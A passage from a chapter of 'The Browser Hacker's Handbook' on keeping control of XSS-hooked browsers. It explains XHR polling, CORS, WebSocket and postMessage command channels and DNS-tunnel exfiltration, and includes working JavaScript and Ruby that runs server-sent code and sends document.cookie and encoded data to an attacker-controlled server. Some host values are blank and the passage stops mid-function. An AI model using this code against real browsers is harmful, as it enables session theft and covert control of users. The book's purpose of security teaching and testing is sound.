Retaining Control - The Browser Hacker’s Handbook (2014)


Chapter 3. Retaining Control

There is limited value in getting your foot in the door if that door gets slammed within moments. In Chapter 2, you learned how to get your foot in the door. Now you need to learn how to keep that door open. In hacking terms, this means that once you have captured the initial control of the browser, you will need to retain it. This is where the Retaining Control phase of the browser hacking methodology comes in.

Retaining control over your target can be categorized into two broad areas. These are Retaining Communication and Retaining Persistence. The primary concept of retaining a communication channel is based on establishing a mechanism to retain control with a targeted browser, or better yet, multiple browsers. Retaining persistence covers techniques that allow the communication channel to remain active despite any actions the user undertakes.

As you will see in the following chapters, many attacks need time for execution, some on the order of seconds. These timing issues are compounded when executing chained attacks, where multiple actions are combined together. Having a stable communication channel is a critical requirement for any serious browser hacking activity. Without it, your time will run out and you will be back to square one.

This chapter covers numerous techniques for retaining control of your target browser to give you time to complete your attack. However, you should not consider the methods an exhaustive list. You might already know some of them; others are less known, and some will work only on specific browser types and versions.

Understanding Control Retention

Retaining control of your target is trickier than just executing your initial instructions. Unless you’re able to somehow inject code into every page, you will lose control when the target navigates away. Ideally, retaining your control over a browser should take place not only in the face of network disconnections, but regardless of what sites the user may be visiting.

So, why do you really need to bother ensuring control is retained over a browser? If you can execute your code in a target’s browser, surely that should be all you have to do, right? Wrong, and don’t call me Shirley! Imagine you want to identify all active hosts on the target browser’s local network, and then follow up with a JavaScript port scan. This activity might take several minutes depending on the number of active hosts and the number of ports being checked. Clearly, you will need to retain control over the browser for a period of time whilst this occurs.

Retaining control over your target can be categorized into two broad areas. These are retaining communication and retaining persistence. They are both important, as they will extend your browser hacking time window.

Retaining communication can occur using numerous kinds of channels reaching back to your controlled web server. In some instances they may even be maintained over DNS without the reliance on HTTP. You can use one that gives you maximum speed but you will likely sacrifice communication with older browsers. You will explore this tradeoff in upcoming sections.

Traditional operating system rootkits achieve persistence through hooking syscalls¹ and injecting code directly into the kernel or even drivers in order to persist across reboots, updates, and sometimes even after OS cleanups. In your case, when the target closes their web browser, the game is all but over, at least temporarily.


The techniques covered in both this, and the previous, chapters can be employed together to conduct what is termed Browser Hooking. Hooking a browser is the process of establishing a bidirectional communication channel with a targeted browser. You will frequently read the term “hooked browser” throughout this book. This simply means any browser that was initially coerced into executing malicious code and can now receive more commands from a central server like BeEF. When new commands are received and executed by the hooked browser, results can be asynchronously returned back to the central server.

Such communication channels enable the execution of advanced chains of attack, in the form of command modules, which can be executed in a logical order. For instance, after establishing initial control over a browser you may first want to retrieve the hooked browser’s internal IP address. Once this is uncovered, you then want to perform a ping sweep on the internal network and finally run a port scan of the responsive hosts. All of these actions can be chained together, and the flow optionally altered depending on the execution results of previous steps.
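The chaining described above can be sketched as a small runner. This is a simplified illustration rather than BeEF's implementation: runChain, the module names, and the canned return values are all hypothetical, and the steps run synchronously for brevity, whereas real command modules report their results asynchronously.

```javascript
// Run command modules in order; each step receives the previous result.
// A step returns null to stop the chain early.
function runChain(steps, initial) {
  var result = initial;
  var executed = [];
  for (var i = 0; i < steps.length; i++) {
    result = steps[i].run(result);
    executed.push(steps[i].name);
    if (result === null) break; // nothing to act on, so stop here
  }
  return { executed: executed, result: result };
}

// Hypothetical stand-ins for real modules: they only return canned data.
var chain = [
  { name: "get_internal_ip", run: function () { return "192.168.1.10"; } },
  { name: "ping_sweep", run: function (ip) {
      var prefix = ip.split(".").slice(0, 3).join(".");
      return [prefix + ".1", prefix + ".20"];
    } },
  { name: "port_scan", run: function (hosts) {
      if (hosts.length === 0) return null;
      return hosts.map(function (h) { return h + ":80"; });
    } }
];

var outcome = runChain(chain, null);
```

Because each step only sees the previous result, a module can end the chain by returning null, which mirrors the idea of altering the flow based on earlier execution results.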

By modularizing the different attack code available within your attacker’s toolkit, a single exploit can be leveraged to perform a wide variety of actions. These actions often introduce an attacker’s feedback loop whereby a particular action may unveil a subsequent issue which, when further investigated, may expose more issues.

Exploring Communication Techniques

When examining communication, the first thing you must understand is how the communication channel works. When choosing the proper channel, you have to consider whether you want browser support or speed.

You can have a very fast channel using bleeding-edge technology that has no support for Internet Explorer 6 or Opera. Depending on your needs, this could be a limitation. For instance, you might be interested just in Chrome because you want to exploit its extensions, and then decide to use a WebSocket channel. The additional speed may necessitate the sacrifice of browser compatibility.

Almost every communication channel you can use is going to rely on some kind of polling. Polling is the client checking for changes or updates from the server. Actually implementing a polling mechanism relies on both a client and a server. In this instance the client is controlled by the JavaScript code injected into the target browser, and the server is a piece of software owned by the attacker that replies to the polling process.

The communication channel is predominantly required for two reasons: to detect client disconnections, and to communicate new commands from the server to the client. As long as the server receives the polling requests, it knows that the client is alive and ready to receive new commands.
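Disconnection detection can be reduced to remembering when each browser last polled. The following sketch shows that bookkeeping on the server side. The names lastSeen, recordPoll, and isAlive are hypothetical, and the timeout value is something you would tune to your polling interval.

```javascript
// Server-side bookkeeping: remember when each hooked browser last polled.
var lastSeen = {};

// Call this whenever a polling request arrives from a session.
function recordPoll(sessionId, nowMs) {
  lastSeen[sessionId] = nowMs;
}

// A browser is considered alive if it polled within the last timeoutMs.
function isAlive(sessionId, nowMs, timeoutMs) {
  if (!Object.prototype.hasOwnProperty.call(lastSeen, sessionId)) {
    return false; // never seen this session
  }
  return (nowMs - lastSeen[sessionId]) <= timeoutMs;
}
```

With a 2 second polling interval, a timeout of a few intervals tolerates an occasional lost request without declaring the browser gone.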

In the following sections, a number of techniques for creating a communication channel are presented. Bear in mind that communication channels are dynamic and can be switched. For example, the default communication channel might use XMLHttpRequest polling, and then switch to a WebSocket channel if the browser supports it. WebRTC-based communication channels are deliberately not covered, as these are relatively new and supported only by Chrome and Firefox at the time of writing².

Using XMLHttpRequest Polling

The XMLHttpRequest object is a good candidate for the default communication channel, thanks to its wide compatibility across browsers. From a BlackBerry phone or an Android system, to Windows XP with IE6, XMLHttpRequest is supported. In older versions of Internet Explorer like 5 and 6, the Microsoft.XMLHTTP functionality needs to be instantiated as an ActiveX object, whereas from IE 7 onward the object can be created natively.

The XMLHttpRequest mechanism that performs the communication magic is quite simple. The object is used to create asynchronous GET requests to your attacking server, in this instance, BeEF. These requests are sent on a regular basis, for example every 2 seconds, using the setInterval(sendRequest, 2000) JavaScript function. Note that the function reference is passed without parentheses, because setInterval(sendRequest(), 2000) would call sendRequest() once and try to schedule its return value instead. The BeEF server will respond in one of two ways:

· With an empty response to indicate that there are no new actions

· With a response having Content-length greater than 0 bytes if you want to instruct the victim browser to do something
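The two response cases can be sketched as a small polling loop. This is an illustrative outline, not BeEF's hook code: handlePollResponse, makeXhrRequest, and startPolling are hypothetical names, and the transport is passed in as a function so the decision logic stays separate from XMLHttpRequest.

```javascript
// Decide what to do with one polling response body.
// Returns false for an empty response, true when a command was handed to run().
function handlePollResponse(body, run) {
  if (body === null || body === undefined || body.length === 0) {
    return false; // empty response: no new actions
  }
  run(body);
  return true;
}

// Build a request function backed by XMLHttpRequest (browser only).
function makeXhrRequest(url) {
  return function (done) {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", url, true); // true = asynchronous
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4) done(xhr.responseText);
    };
    xhr.send(null);
  };
}

// Poll every intervalMs; request(done) performs one GET and calls done(body).
function startPolling(request, run, intervalMs) {
  return setInterval(function () {
    request(function (body) { handlePollResponse(body, run); });
  }, intervalMs);
}
```

In a browser this could be started with startPolling(makeXhrRequest(url), run, 2000), where url points at your server and run evaluates the received command. The returned timer id can be passed to clearInterval() to stop polling.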

As you can see in Figure 3-1, the highlighted request has a response size of 365 bytes because the server has new commands for the client.

Figure 3-1: XMLHttpRequest polling details in Firefox’s Firebug


The new logic will be additional JavaScript code leveraging JavaScript closures. For example, in the following code snippet, exec_wrapper returns a closure:

var a = 123;
function exec_wrapper(){
  var b = 789;
  function do_something(){
    a = 456;
    console.log(a); // 456 -> global a, reassigned above
    console.log(b); // 789 -> b from the enclosing exec_wrapper scope
  }
  return do_something;
}
console.log(a); // 123 -> global scope
var wrapper = exec_wrapper();



A closure, particularly in the context of JavaScript, is a function bundled together with the environment in which it was created. What’s interesting about the previous code snippet is that, after exec_wrapper() has executed, you would expect the b variable to be no longer accessible, because it was declared outside the do_something() function that exec_wrapper() returned. If you then execute wrapper(); you will see that 456 and 789 are printed, meaning that the b variable was still accessible.

This is because the function returned by exec_wrapper() is a closure, and its environment includes any local variables that were in scope when it was created. Closures also come in handy when you want to emulate a private method, in order to control data visibility, because JavaScript doesn’t provide a native way of doing this. This is one way of bringing object-oriented programming concepts to JavaScript.

Closures are great for the purpose of adding new dynamic code because private variables (declared with var) inside the closure are hidden from the global scope³. Using a closure, you are able to associate environment data with a function that operates on that data.
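A short sketch of the private-state idea follows. The makeCommandCounter name is hypothetical, chosen only for this illustration. The count variable lives in the closure's environment, so it can be changed only through the two returned functions.

```javascript
// Emulate private state with a closure.
function makeCommandCounter() {
  var count = 0; // private: not reachable from outside this function
  return {
    increment: function () { count += 1; return count; },
    current: function () { return count; }
  };
}

var counter = makeCommandCounter();
counter.increment();
counter.increment();
```

Each call to makeCommandCounter() creates a fresh environment, so two counters never share state, which is the property that keeps separately delivered pieces of code from interfering with each other.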

If you were to submit the preceding code numerous times, encapsulating its logic into a closure is mandatory in order to “confine” the new code into its own function. Following BeEF’s taxonomy, the remaining examples will be referred to as command modules, because they are new commands for the browser to execute.

The idea of closures can be expanded to create a wrapper that adds command modules to a stack. Every time a polling request is completed, commands.pop() removes the last element of the stack, which is then executed. The following code is a sample implementation of this approach. The lock object and the poll() function have been excluded for brevity:


/**
 * The stack of commands.
 */
commands: new Array(),
/**
 * Wrapper. Add the command module to the stack of commands.
 */
execute: function(fn) {
  this.commands.push(fn);
},
/**
 * Do Polling. If the response is != 0, call execute_commands()
 */
get_commands: function() {
  var self = this; // keep a reference for use inside the callback
  try {
    this.lock = true;
    //poll the server_host for new commands
    poll(server_host, function(response) {
      if (response.body != null && response.body.length > 0)
        self.execute_commands();
    });
  } catch(e){
    this.lock = false;
    return;
  }
  this.lock = false;
},
/**
 * Executes the received commands, if any.
 */
execute_commands: function() {
  if(this.commands.length == 0) return;
  this.lock = true;
  while(this.commands.length > 0) {
    var command = this.commands.pop();
    try {
      command();
    } catch(e) {
      // a failing command module must not stop the remaining ones
      console.error(e.message);
    }
  }
  this.lock = false;
}


As you can see in the execute_commands() function, if the command stack is not empty, every single entry will be popped and executed. It is possible to call command() inside the try block because of the use of closures, meaning that the command module is encapsulated inside its own anonymous function:

execute(function() {
  var msg = "What is your password?";
  prompt(msg);
});



A function is called anonymous when it is dynamically declared at run time, without a specific name. These functions are useful when you need to execute small pieces of code, especially when that code is used just once and not in other areas. This concept is commonly used when registering anonymous functions against event handlers, for instance:

aButton.addEventListener('click',function(){alert('you clicked me');},false);

When the preceding command module lands in the target browser’s DOM, the execute() wrapper is called, and the following JavaScript code is going to be a new layer on the commands stack:

function() {
  var msg = "What is your password?";
  prompt(msg);
}



Finally, when commands.pop() runs and then tries executing the popped code, a prompt dialog box showing the msg content is displayed.

If you read the sample implementation code, you can clearly see the commands array has been implemented as a stack, also known as a Last In First Out (LIFO) data structure. You might wonder why it has not been implemented as a First In First Out (FIFO) structure instead. This is a fair question, and it mainly depends on your needs. If you need to correlate command module executions between each other, having siblings and module input depending on previous module output, a FIFO data structure might be preferable.
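The difference between the two structures comes down to which end of the array the next command is taken from. The following sketch uses hypothetical helpers (drain and makeModules) to run the same three modules in both orders.

```javascript
// Execute every queued module, using takeNext to pick the next one.
function drain(queue, takeNext) {
  var order = [];
  while (queue.length > 0) {
    var module = takeNext(queue);
    order.push(module());
  }
  return order;
}

// Three stand-in command modules, queued in this order.
function makeModules() {
  return [
    function () { return "first"; },
    function () { return "second"; },
    function () { return "third"; }
  ];
}

// LIFO: pop() takes the most recently added module.
var lifoOrder = drain(makeModules(), function (q) { return q.pop(); });
// FIFO: shift() takes the oldest module.
var fifoOrder = drain(makeModules(), function (q) { return q.shift(); });
```

Swapping pop() for shift() is the only change needed to turn the stack into a queue, so modules whose input depends on an earlier module's output run in the order they were received.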

Using Cross-origin Resource Sharing

CORS allows a web application to specify different origins that can read HTTP responses by slightly extending the SOP. This is particularly useful if you want your central attacking server to be able to communicate with browsers visiting different origins.

The BeEF server achieves this by including the following additional HTTP response headers, allowing cross-origin POST and GET requests from anywhere:

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: POST, GET

When the XMLHttpRequest object is used to send a cross-origin GET request, if the target origin returns the previous headers, the full HTTP response can be read. When these CORS headers are not included, the SOP prevents the XMLHttpRequest object from reading the full HTTP response.
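As a rough illustration of the server side, the two headers can be added by a small helper. This sketch is written for any response object that exposes setHeader(), such as the one Node's http module passes to a request handler. It is not BeEF's own code, which is written in Ruby, and addCorsHeaders is a hypothetical name.

```javascript
// Add the permissive CORS headers to a response object.
function addCorsHeaders(res) {
  res.setHeader("Access-Control-Allow-Origin", "*");
  res.setHeader("Access-Control-Allow-Methods", "POST, GET");
  return res;
}

// Possible use inside a Node request handler:
//   require("http").createServer(function (req, res) {
//     addCorsHeaders(res);
//     res.end(""); // empty body: no new commands
//   });
```

The wildcard origin is what lets a hook running on any origin read the response, which is the behavior this section relies on.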

As with any specification, CORS has its implementation quirks too. In this case, Internet Explorer lacked full support until version 10, and Opera Mini lacks support altogether. IE versions 8 and 9 partially support CORS through the XDomainRequest object, but this introduced the following limits in its use⁴:

· Only HTTP and HTTPS schemes are fully supported.

· No custom headers are allowed in the request.

· Request content-type defaults to text/plain, and can’t be overridden.

· Cookies and other authentication request headers can’t be sent.

Using CORS as a communication channel is an effective way to maintain an ongoing relationship between a hooked browser and your server. However, sometimes you may want to use a faster channel, such as the WebSocket protocol. This is explored in the next section.

Using WebSocket Communication

The WebSocket protocol is a very fast, full-duplex communication channel. This technology enables you to have stringent event-driven actions without the explicit need to poll the server. This doesn’t mean you throw away your internal polling mechanism altogether—depending on your needs and the architecture of the communication channel, there may be benefits to keeping some form of polling.

The WebSocket API is a replacement for other AJAX-Push technologies like Comet⁵. Whereas Comet requires additional client libraries, the WebSocket API is implemented natively in modern browsers. As you can see in Figure 3-2, all the latest browsers, including Internet Explorer 10, support the WebSocket protocol natively. The only exceptions are some mobile browsers like Opera Mini and Android’s native browser.

Figure 3-2: WebSocket protocol support in common browsers


Various projects aim at adding WebSocket compatibility to unsupported browsers. One of the more notable projects is Socket.io⁶. Socket.io still relies on an additional JavaScript library to be used client-side, but provides reliable connectivity by selecting the most capable transport at run time. Some of the available channels in Socket.io include the WebSocket protocol, Adobe Flash Sockets, AJAX long polling, and JSONP polling.

The following code shows a very simple communication channel between a Ruby web server and a hooked browser. The Ruby WebSocket server implementation is based on the EM-WebSocket⁷ library (or gem). EM-WebSocket is an asynchronous and fast EventMachine⁸-based implementation.

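require 'em-websocket'

EventMachine.run {
  EventMachine::WebSocket.start(
    :host => "",
    :port => 6666,
    :secure => false) do |ws|
    begin
      ws.onmessage do |msg|
        p "Received:"
        p "->#{msg}"
        # reply with a new command: an anonymous function wrapping alert(1)
        ws.send("(function(){alert(1)})();")
      end
    rescue Exception => e
      print_error "WebSocket error: #{e}"
    end
  end
}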




This snippet of code binds the WebSocket server on port 6666, waiting for new messages from clients. When a message is received, a new command is sent to the client. You will note a similarity with the code presented in the previous XMLHttpRequest example: the anonymous function, function(){alert(1)}. For brevity’s sake, we are not using the execute() wrapper with closures as used before, but this code can be easily modified in order to support that.

The client-side code is written in JavaScript using the native WebSocket API. When the WebSocket channel is open, the client sends a message to the server, asking for more commands. When the server replies, the onmessage event is triggered, and the data coming from the server is executed, creating a new Function object. The data flowing through the WebSocket channel can be a String, Blob, or ArrayBuffer type. In this case, the type is String, which means the code needs to be evaluated through the process of instantiating it with new Function(). We’ve assumed the attacker server and the JavaScript code that is sent are implicitly trusted, so using Function in this way is relatively safer than using eval.

var socket = new WebSocket("ws://");
socket.onopen = function(){
  console.log("Socket open.");
  socket.send("Server, send me commands.");
};
socket.onmessage = function(msg){
  // msg.data holds the String sent by the server
  var f = new Function(msg.data);
  f();
  console.log("Command received and executed.");
};
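One concrete difference between the two evaluation approaches is scope. Code passed to a direct eval() call runs inside the calling function and can read its local variables, whereas a function created with new Function() is compiled in the global scope and cannot. The following sketch demonstrates this. The function and variable names are hypothetical.

```javascript
// Direct eval: the evaluated code sees the caller's local variables.
function runWithEval(code) {
  var secret = "local state";
  return eval(code);
}

// new Function: the body is compiled in the global scope,
// so the local variable below is invisible to it.
function runWithFunction(code) {
  var secret = "local state";
  return new Function(code)();
}

var viaEval = runWithEval("typeof secret");
var viaFunction = runWithFunction("return typeof secret;");
```

Here viaEval is "string" while viaFunction is "undefined", assuming no global variable named secret exists. A received command therefore cannot accidentally read or overwrite the locals of the handler that executes it.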


As you saw in Figure 3-2, not every browser supports the WebSocket API natively. Say you’re using XMLHttpRequest objects as the default communication channel in order to support more browsers, but you want to upgrade a particular channel to use the WebSocket protocol. First, you need to determine whether the WebSocket protocol is supported, which means fingerprinting the browser’s capabilities. Various techniques to achieve accurate and extensive browser fingerprinting are discussed in the Fingerprinting Browsers section of Chapter 6; however, you can determine if either the WebSocket API or Mozilla’s MozWebSocket is supported with the following code:

hasWebSocket: function() {
  return !!window.WebSocket || !!window.MozWebSocket;
}


If this returns true, you’re able to use the WebSocket protocol in your JavaScript. The MozWebSocket object is similar to the WebSocket object with a prefix, added by Mozilla in some older versions of Firefox (versions 6 to 10). The standard WebSocket object can be used without the need for a prefix from Firefox version 11.
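Building on that check, channel selection could look like the following sketch. The chooseChannel name and the returned labels are hypothetical. The window object is passed in as a parameter so the logic can be exercised outside a browser.

```javascript
// Pick the fastest channel the browser supports, falling back to XHR polling.
function chooseChannel(win) {
  if (win.WebSocket || win.MozWebSocket) {
    return "websocket";
  }
  // ActiveXObject covers old Internet Explorer versions without native XHR
  if (win.XMLHttpRequest || win.ActiveXObject) {
    return "xhr";
  }
  return "none";
}
```

In a hooked page you would call chooseChannel(window) once the default XMLHttpRequest channel is up, and upgrade only if it returns "websocket".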

Using Messaging Communication

As introduced in Chapter 1, window.postMessage() is another native method to achieve cross-origin communication, while respecting the SOP. Using this method requires setup. First, you need to host content for an IFrame on your attacking server, as in this example:



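<html>
<body>
<b>Embed me on a different origin</b>
<div id="debug">Ready to receive data...</div>
<script>
window.addEventListener("message", receiveMessage, false);
function doClick() {
  // Assumed values: location.host as the sender label and "*" as a
  // placeholder target origin
  parent.postMessage("Message sent from " + location.host, "*");
}
var debug = document.getElementById("debug");
function receiveMessage(event) {
  debug.innerHTML += "Data: " + event.data + "\n Origin: " + event.origin;
  // reply to the sender with a new command
  parent.postMessage("alert(1)", event.origin);
}
</script>
</body>
</html>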





Next, you need to exploit an XSS vulnerability on the target’s site. The injected payload requires JavaScript logic plus the IFrame itself. The created IFrame loads the previous code snippet. Note the to_server IFrame and the post_msg() and receiveMessage() functions here:

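<div id="debug"> </div>
<div id="ui">
<input type="text" id="v" />
<input type="button" value="Send to server" onclick="post_msg();" />
<!-- src is the URL of the page hosted on the attacking server -->
<iframe id="to_server" src=""></iframe>
</div>
<script type="text/javascript">
window.addEventListener("message", receiveMessage, false);
var infoBar = document.getElementById("debug");
function receiveMessage(event) {
  infoBar.innerHTML += event.origin + ": " + event.data + "";
  // evaluate the command sent back by the framed page
  new Function(event.data)();
}
function post_msg(domain) {
  var to_server = document.getElementById("to_server");
  // "*" is a placeholder; use the attacking server's origin as the target
  to_server.contentWindow.postMessage("" + document.cookie, "*");
}
</script>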





You can see an example of the domain cookies that are sent to the attacking server in Figure 3-3.

Figure 3-3: Breakpoint on the framed attacker’s code


After the code loaded from the attacking server receives the data from a different origin, it replies with additional JavaScript code, which is evaluated by creating a new Function on the hooked page. In the previous code sample a simple alert(1) was sent, as you can see in Figure 3-4.

Figure 3-4: The response is evaluated and the JavaScript is executed
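Because any window can post a message to the hooked page, the receiving function may want to check where a message came from before evaluating it. The following sketch wraps that check in a hypothetical makeReceiver() helper. The origin passed in would be that of your attacking server, and run is whatever function executes the command.

```javascript
// Build a message handler that only executes commands from one origin.
function makeReceiver(trustedOrigin, run) {
  return function receiveMessage(event) {
    if (event.origin !== trustedOrigin) {
      return false; // ignore messages from any other sender
    }
    run(event.data);
    return true;
  };
}

// Possible use in the hooked page (the origin shown is a made-up example):
//   window.addEventListener("message",
//     makeReceiver("https://attacker.example", function (code) {
//       new Function(code)();
//     }), false);
```

This keeps other frames on the page from injecting their own commands into your channel.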


window.postMessage() can be useful to communicate between different windows, such as IFrames, pop-ups, and pop-unders, and generally tabs. As always, some quirks exist across browsers. In Internet Explorer 8 and above it is possible to use window.postMessage() for IFrames only, but not for other tabs or windows. For an overview of the postMessage() support across browsers, see Figure 3-5.

Figure 3-5: window.postMessage() support in common browsers


Internet Explorer versions 8 to 10 only partially support postMessage(), whereas the WebSocket protocol is fully supported⁹. This is one of the main reasons you might want to consider using postMessage() as your primary communication channel (if the hooked browser is not Internet Explorer).

Using DNS Tunnel Communication

Each of the previously discussed communication channels relies on the HTTP protocol. The WebSocket protocol is the exception, but its initial handshake still relies on an HTTP request that is interpreted by an HTTP server as an Upgrade¹⁰ request such as:

GET /ws HTTP/1.1


Upgrade: websocket

Connection: Upgrade

Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==


Sec-WebSocket-Version: 13

There is nothing wrong with this, unless you are hooking browsers without a direct connection, such as those behind an HTTP proxy that logs everything and potentially inspects the content. This is where a DNS-based communication channel might come in handy, together with other evasion techniques that can be used to reduce the likelihood of detection. Only a few security solutions monitor DNS requests,¹¹ and often their effectiveness is challenged because most modern browsers use DNS prefetching. DNS prefetching is primarily used to improve the user experience by increasing the responsiveness of loading future resources.

Kenton Born presented research¹² at BlackHat 2010 on leveraging DNS covert channels from the browser itself. This method is effective when data needs to be extruded only one way, from the browser to the server. However, it becomes more complex if the communication is meant to be bidirectional.

You can create a simple DNS-based unidirectional exfiltration channel that sends requests to crafted domains, which are resolved by a DNS server under your control. Such a channel could be used to pass a symmetric key to the client, in order to encrypt the data exchanged between the client and the server in subsequent HTTP requests and responses. For example, if you want to send the string ABCDE using this technique you could encode the data and submit it as a subdomain resolution request. If your DNS server answers queries for every subdomain of a domain you control, you can send the data payload simply by requesting an image resource, for instance an <img> element whose src hostname is _encodedData_ prepended to that domain. A simple JavaScript function to generate _encodedData_ may look like this:

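encode_data = function(str) {
  var result="";
  for(var i=0;i<str.length;++i) {
    // assumed encoding: hex-encode each character so that only
    // characters valid in a domain name remain
    result+=str.charCodeAt(i).toString(16).toUpperCase();
  }
  return result;
};
var data = "data_to_extrude_from_client_to_server";
var _encodedData_ = encodeURI(encode_data(data));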


The preceding code is required because domain names can contain only alphanumeric characters plus hyphens (-) and dots (.). The result of encode_data(), given the data used in the preceding code example, will be:



An additional limitation to consider is that FQDNs are limited to 255 characters, including dots. Considering these limitations, the code snippet shown earlier can be extended with the following:

var max_domain_length = 255;
// attack_domain is a stand-in name for the domain served by your DNS
// server; its value is not given here
var attack_domain = "";
var max_segment_length = max_domain_length - attack_domain.length;
var dom = document.createElement('b');
// splits strings into chunks
String.prototype.chunk = function(n) {
  if (typeof n=='undefined') n=100;
  return this.match(RegExp('.{1,'+n+'}','g'));
};
// sends a DNS request
sendQuery = function(query) {
  var img = new Image;
  img.src = "http://"+query;
  img.onload = function() { dom.removeChild(this); }
  img.onerror = function() { dom.removeChild(this); }
  dom.appendChild(img);
};
// Split message into segments
segments = _encodedData_.chunk(max_segment_length);
for (seq=1; seq<=segments.length; seq++) {
  // send segment
  sendQuery(seq+"."+segments.length+"." +
    segments[seq-1]+"."+attack_domain);
}



Depending on the length of the domain you’re using for your attack and the FQDN limits discussed previously, the preceding snippet is responsible for splitting the encoded data into chunks like this:


Because the data payload is likely to be bigger than a simple string of five characters, it is first split into chunks. For each chunk, a corresponding IMG element is appended to the DOM. Image tags are used because, when DNS prefetching is disabled in the browser, the src attribute will be resolved first, resulting in a DNS query. The HTTP request to retrieve the image will be issued later. Also note that if the response from your DNS server is Error or Not Found, the subsequent HTTP request will never be sent. At the same time, the DNS server would already have processed the data coming from the client. This is useful in achieving a stealthier communication.
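One further constraint is worth keeping in mind when chunking: besides the overall name length, RFC 1035 limits each dot-separated label to 63 octets. The following sketch shows one way to encode, chunk, and decode data within both limits. It is an illustration under stated assumptions rather than the book's implementation. The function names, the hex encoding, the seq.total.chunk.domain layout, and the tunnel.example domain used in the usage note are all assumptions, and the input is assumed to contain only single-byte characters.

```javascript
var MAX_LABEL = 63;  // RFC 1035: a single label holds at most 63 octets
var MAX_NAME = 253;  // longest name when written in dotted text form

// Hex-encode a string of single-byte characters (two hex digits each).
function hexEncode(str) {
  var out = "";
  for (var i = 0; i < str.length; i++) {
    out += ("0" + (str.charCodeAt(i) & 0xff).toString(16)).slice(-2);
  }
  return out;
}

// Reverse of hexEncode, as the DNS server would apply it.
function hexDecode(hex) {
  var out = "";
  for (var i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Build one query name per chunk: <seq>.<total>.<chunk>.<domain>
function buildQueryNames(hex, domain) {
  // MAX_LABEL - 1 = 62 keeps whole bytes (two hex digits) in each label
  var chunker = new RegExp(".{1," + (MAX_LABEL - 1) + "}", "g");
  var chunks = hex.match(chunker) || [];
  return chunks.map(function (chunk, i) {
    var name = (i + 1) + "." + chunks.length + "." + chunk + "." + domain;
    if (name.length > MAX_NAME) throw new Error("query name too long");
    return name;
  });
}
```

For example, buildQueryNames(hexEncode("ABCDE"), "tunnel.example") produces a single name whose data label is 4142434445. On the server, the sequence and total fields let you reorder the chunks before passing the joined data to hexDecode().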

This approach works well if you want to communicate from the client to the DNS server you control, but you might wonder how it works the other way. How can you achieve bidirectional communication, sending data from the server to the client? This is harder to achieve, but still possible.

One of the ways to implement bidirectional communication is to rely on the timing of DNS queries, meaning how long it takes for a domain to resolve. You can, for example, deduce that the server wanted to send 0 if a domain was resolved in less than a second. On the other hand, you can deduce the server wanted to send 1 if the domain was resolved in more than a second. In this way, the browser can reconstruct strings based on their binary representation, ultimately using String.fromCharCode().
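The timing approach can be sketched in two steps: turning measured resolution times into bits, and turning bits into characters. The function names and the 1000 ms threshold are assumptions for illustration, and the measurement itself (timing an image load, for example) is left out.

```javascript
// Map each measured resolution time to a bit: fast = 0, slow = 1.
function bitsFromTimings(timingsMs, thresholdMs) {
  return timingsMs.map(function (t) {
    return t < thresholdMs ? 0 : 1;
  });
}

// Rebuild a string from bits, eight at a time, most significant bit first.
function bitsToString(bits) {
  var out = "";
  for (var i = 0; i + 8 <= bits.length; i += 8) {
    var code = 0;
    for (var j = 0; j < 8; j++) {
      code = (code << 1) | bits[i + j];
    }
    out += String.fromCharCode(code);
  }
  return out;
}
```

Every bit costs at least one DNS resolution, and a 1 bit costs more than a second by design, which is why this approach is slow compared with the one described next.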

A faster method is using successful and unsuccessful connections to the domains that signify each bit of data. That is, a single domain maps to a single bit of data. These resolution errors can be detected through JavaScript.

In this example, shown in Figure 3-6, the domain would represent a 1 or a 0 depending upon whether or not it resolves (and returns a resource).

Figure 3-6: Resolving domains


Two different domains have been queried in Figure 3-6 with different results. To aid in spotting the difference, the arrow points to the character that subtly varies in each request. One resolves and the other does not. This is the basis for the bit state detection in the transfer of data through the DNS tunnel from the server to the client. In this instance, the IP address is returned when a bit is to be set to true. The reason for this is explained later in this section, and shown in Figures 3-7 and 3-8.

Figure 3-7: A 1 bit is returned


Figure 3-7 shows the process of returning a 1 bit via a browser DNS tunnel. After the image has been successfully loaded (cross-origin), the onload function is called to signal the storage of the true state of the bit.

Figure 3-8: A 0 bit is returned


Figure 3-8 shows the transfer of information from the DNS tunnel again, however, in this instance a 0 bit has been communicated. After the image fails to load due to the domain not being found (cross-origin), the onerror function is called to signal the storage of the 0 state of the bit.

The binary transfer process will be set up with the browser communicating to the DNS tunnel server which IP address it should return for the true state. Now the data can start being transferred from the server to the browser using the tunnel.

The following code snippet is an example of how to retrieve a string from a DNS tunnel. Note that the first step — passing the IP address to the DNS tunnel — is skipped to simplify the demonstration. The IP address has been hard-coded in the DNS tunnel server for the snippet.

var tunnel_domain = ""; // location of the DNS server
var dom = document.createElement('b');
var messages = new Array();
var bits = new Array();
var bit_transfered = new Array();
var timing = new Array();
// Do the DNS query by requesting an image
send_query = function(fqdn, msg, byte, bit) {
  var img = new Image;
  img.src = "http://" + fqdn + "/favicon.ico";
  img.onload = function() { // successful load so bit equals 1
    bits[msg][bit] = 1;
    bit_transfered[msg][byte]++;
    if (bit_transfered[msg][byte] >= 8)
      reconstruct_byte(msg, byte);
    dom.removeChild(this);
  }
  img.onerror = function() { // unsuccessful load so bit equals 0
    bits[msg][bit] = 0;
    bit_transfered[msg][byte]++;
    if (bit_transfered[msg][byte] >= 8)
      reconstruct_byte(msg, byte);
    dom.removeChild(this);
  }
  dom.appendChild(img);
}
// Construct the request and send it via send_query
function get_byte(msg, byte) {
  bit_transfered[msg][byte] = 0
  // Request the byte one bit at a time
  for(var bit=byte*8; bit < (byte*8)+8; bit++){
    // Set the message number (hex)
    msg_str = ("00000000" + msg.toString(16)).substr(-8);
    // Set the bit number (hex)
    bit_str = ("00000000" + bit.toString(16)).substr(-8);
    // Build the subdomain
    subdomain = "bit-" + msg_str +"-" + bit_str;
    // build the full domain
    domain = subdomain + '.' + tunnel_domain;
    // Request something like
    // bit-00000000-00000007.<tunnel_domain>
    send_query(domain, msg, byte, bit)
  }
}
// Build the environment and request the message
function get_message(msg) {
  // Set variables for getting a message
  messages[msg] = "";
  bits[msg] = new Array();
  bit_transfered[msg] = new Array();
  timing[msg] = (new Date()).getTime(); // start time in milliseconds
  get_byte(msg, 0);
}
// Build the data returned from the binary results
function reconstruct_byte(msg, byte){
  var char = 0;
  // Build the last byte requested
  for(var bit=byte*8; bit < (byte*8)+8; bit++){
